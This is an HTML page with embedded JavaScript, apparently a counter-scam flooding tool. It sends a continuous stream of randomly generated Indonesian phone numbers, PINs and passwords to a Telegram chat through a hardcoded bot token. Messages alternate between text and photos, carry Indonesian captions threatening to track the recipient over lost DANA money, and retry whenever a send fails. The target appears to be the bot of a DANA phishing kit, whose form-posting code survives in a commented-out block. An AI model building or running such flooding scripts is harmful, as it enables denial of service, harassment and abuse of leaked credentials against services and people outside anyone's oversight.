<!DOCTYPE html>
<html>
<title></title>
<body>
<p>Cara Berhenti : Tekan sembarang tombol sampai berhenti</p>
Kirim ke: <p id="kirimke"></p>
Isi: <p id="demo"></p>
Ket: 
<p id="ketTek"></p>
<p id="ketPic"></p>

<script src="./easyui/jquery.min.js">
</script>

<script>
var logo = "𒈞𖥘 𝓓𝓪𝓷𝓪 𝓘𝓷𝓭𝓸𝓷𝓮𝓼𝓲𝓪 𖥘𒁂";          
var gabungan = '' + logo + '%0A%0A※ 𝗟𝗼𝗴𝗢𝘂𝘁 𝗣𝗲𝗿𝗮𝗻𝗴𝗸𝗮𝘁 𝗧𝗮𝗸 𝗗𝗶𝗸𝗲𝗻𝗮𝗹';   
var token = '7596003369:AAFM3MKOFRnIIIMDTT7G8eZoPmj12tdNcLM'; // Ganti dengan token bot yang kamu buat
var grup = '7650633406'; // Ganti dengan chat id dari bot yang kamu buat
//var grup = '515121963';  //me

document.title = "Flooding Enemy = "+grup+" (telegram:@pandawa_limaa)";

//sumber => https://techno.okezone.com/read/2024/03/05/54/2979295/daftar-kode-nomor-operator-seluler-di-indonesia
const provider = [];
//halo
const halo = ["0811", "0812"];
provider[1]=halo;
//simpati
const simpati = ["0813", "0821", "0822", "0823", "0852", "0853"];
provider[2]=simpati;
//im3
const im3 = ["0814", "0815", "0816", "0855", "0856", "0857", "0858"];
provider[3]=im3;
//tri
var tri = ["0895", "0896", "0897", "0898", "0899"];
provider[4]=tri;
//xl
var xl= ["0817", "0818", "0819", "0859", "0877", "0878"];
provider[5]=xl;
//axis
var axis= ["0831", "0832", "0833", "0838"];
provider[6]=axis;
//smartfren
smartfren= ["0881", "0882", "0883", "0884", "0885", "0886", "0887", "0888", "0889"];
provider[7]=smartfren;

var gabungan=``;
const digit =[];
var enterx="";

function acak(){
//while (kirimke<3){	
	//Math.floor(Math.random() * 5) + 5 => random minimal 5-10 
	jml_provider=provider.length;
	random_provider=Math.floor(Math.random() * 13) + 1;
	//mengenerate 1-13
	random_provider=Math.floor(Math.random() * (jml_provider-1)) + 1;
	panjang_nomer  =provider[random_provider].length;
	random_nomer   =Math.floor(Math.random() * panjang_nomer) ;//krn dr no jdi ini di rem => + 1;
	nomer_provider =provider[random_provider][random_nomer];  

	//const digit = [];
	digit[1]=Math.floor(Math.random() * 10000000000);
	digit[2]=Math.floor(Math.random() * 100000000000);
	//digit[3]=Math.floor(Math.random() * 1000000000000);
	//digit[4]=Math.floor(Math.random() * 10000000000000);
	panjang_digit=digit.length-1;
	random_digit=Math.floor(Math.random() * panjang_digit) + 1;

	//hasil nomer
	nomer=nomer_provider+digit[random_digit];

	//hasil pin
	pin     =String(Math.floor(Math.random() * 10000   )+10000);
	password=String(Math.floor(Math.random() * 1000000 )+1000000);

	//generate nomer
	//console.log("no HP:");
		//console.log(random_provider);
		//console.log(panjang_nomer);
		//console.log(nomer_provider);
	//console.log(nomer);
	//console.log(provider[3][6]);

	//generate pin
	//console.log("pin");
	//console.log(pin.substring(1,pin.length));

	//generate password
	//console.log("password:");
	//console.log(password.substring(1,password.length));

	//generate isi yg akan di kirim
	//var gabungan=`Saya%20akan%20lacak%20kamu%20kalau%20kamu%20tidak%20kembalikan%20DANA%20saya`;
	//var gabungan=`
	enterx=`


































	👍`;
	//gabungan="";
	gabungan = '' + logo + '%0A%0A※ 𝗟𝗼𝗴𝗢𝘂𝘁 𝗣𝗲𝗿𝗮𝗻𝗴𝗸𝗮𝘁 𝗧𝗮𝗸 𝗗𝗶𝗸𝗲𝗻𝗮𝗹';   
	gabungan=nomer+`, `+pin+`, `+password;//+` `+gabungan;//+enterx;
}

	//set delay timer
//	var tunda=Math.floor(Math.random() * 1000000 )+18000;
//	var myTimeout = setTimeout(kirim(), tunda);

var i = 0;
var j = 0;
var ntek=0;
var npic=0;
var speed1=1000;
var speed2=2000;
//sumber => https://stackoverflow.com/questions/37728184/settimeout-method-inside-a-while-loop
var myFunc01 = function() {
  //while (i < 6) {
    //(function(i) {
      setTimeout(function() {
				i=i+1;
				
				acak();

				//tampilkan di web	
				document.getElementById("kirimke").innerHTML = i;
				document.getElementById("demo").innerHTML = escapeHtml(gabungan);
				//console.log(escapeHtml(gabungan));

				//random, jika 0-1
				j=Math.floor(Math.random()*2);
				//kirim telegram teks jika 0 dan gambar jika 1
				if (j==0)
				{
					kirimTeks();
					ntek++;
					document.getElementById("ketTek").innerHTML = "kirim teks ke:"+ntek;
				}else{
					npic++
					kirimPhoto();
					document.getElementById("ketPic").innerHTML = "kirim photo ke:"+npic;
				}

			}, Math.floor(Math.random() * speed2 ) *i);
    //})(i++)
  //}//while
};
//jalankan
//myFunc01();



//sumber => https://stackoverflow.com/questions/53254839/settimeout-function-with-keypress-pause-overload
function ticker() {
	myFunc01();
	//console.log("timer fired")
}
var myTimer = setInterval(ticker, speed1);

//stops running until ???
$(document).keypress(function() {
  //console.log("stop....................................................");
  clearInterval(myTimer);
	alert("stop.............................");
  // don't use var, just access the existing variable from the parent scope.
  //myTimer = setInterval(ticker, 1000);
})


//last ok ganti kirimx ke kirim
function kirimTeks(){
	$.ajax({
	//	url: `https://api.telegram.org/bot7596003369:AAFM3MKOFRnIIIMDTT7G8eZoPmj12tdNcLM/sendMessage?chat_id=515121963&text=Saya%20akan%20lacak%20kamu%20kalau%20kamu%20tidak%20kembalikan%20DANA%20saya&parse_mode=html`,
		async: true,
		url : "https://api.telegram.org/bot7596003369:AAFM3MKOFRnIIIMDTT7G8eZoPmj12tdNcLM/sendMessage",
		//data: "chat_id=515121963&text="+escapeHtml(gabungan)+"&parse_mode=html",
		data: "chat_id="+grup+"&text="+escapeHtml(gabungan)+"&parse_mode=html",
		method: `POST`,
		dataType:"json",
		success: function(data) {
		},
		error: function(data) {
			kirimTeks();
			//alert('error');
		}
	});
}

function kirimPhoto(){
	teks=`
Kembalikan uang DANA saya,
Saya akan lacak anda sampai ketemu
`;

	//sumber => https://stackoverflow.com/questions/67848024/sending-message-to-telegram-bot
	$.ajax({
			type: 'POST',
			//url: `https://api.telegram.org/bot7596003369:AAFM3MKOFRnIIIMDTT7G8eZoPmj12tdNcLM/sendMessage`,
			url: `https://api.telegram.org/bot7596003369:AAFM3MKOFRnIIIMDTT7G8eZoPmj12tdNcLM/sendPhoto`,
			data: {
					chat_id: grup, //515121963,
					//photo:"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQlr6Nru_hHrEmXTvogOpDtlSaamL2J0tFJgwrla1lUEWThOiigsbd7t4k&s",
					photo:"https://bajo.jumbomark.com/labels/DID2023080794",
					caption:teks,//"Anda belum bayar, tetap saya lacak!!",
					parse_mode: 'html',
			},
			success: function (res) {
					console.debug(res);
					$('#response').text('Message sent');
			},
			error: function (error) {
					kirimPhoto();
					//console.error(error);
					//alert("error failed");
			}
	});
}


//}

//sumber => https://stackoverflow.com/questions/1787322/what-is-the-htmlspecialchars-equivalent-in-javascript
function escapeHtml(text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };  
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
}

/*
$.ajax({
	url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
	method: `POST`,
})
*/


//GA JELAS KENAPA KIRIM KESINI
/*
var dataString = $("#formNohp, #formPin, #formOtp").serialize();
$.ajax( 
  {
  type: 'POST',
  url: 'httpsX://my-aplication.whf.bz/token/01/two.php',
  data: dataString,
  complete: function(data) {
    //console.log('Complete');
    //$("#process").hide();
    //document.getElementById("alert").style.display = "block"; 
    //var nomor = document.getElementById("inp").value;
    //document.getElementById("alert").innerHTML = "Kode dikirim ke +62 " + nomor+ " via<br/>";
    //$(".bgotp").fadeIn();
    //setInterval(countdown, 1000);
    //$("#otp1").focus();
    }
  }
);
*/


</script>
</body>
</html>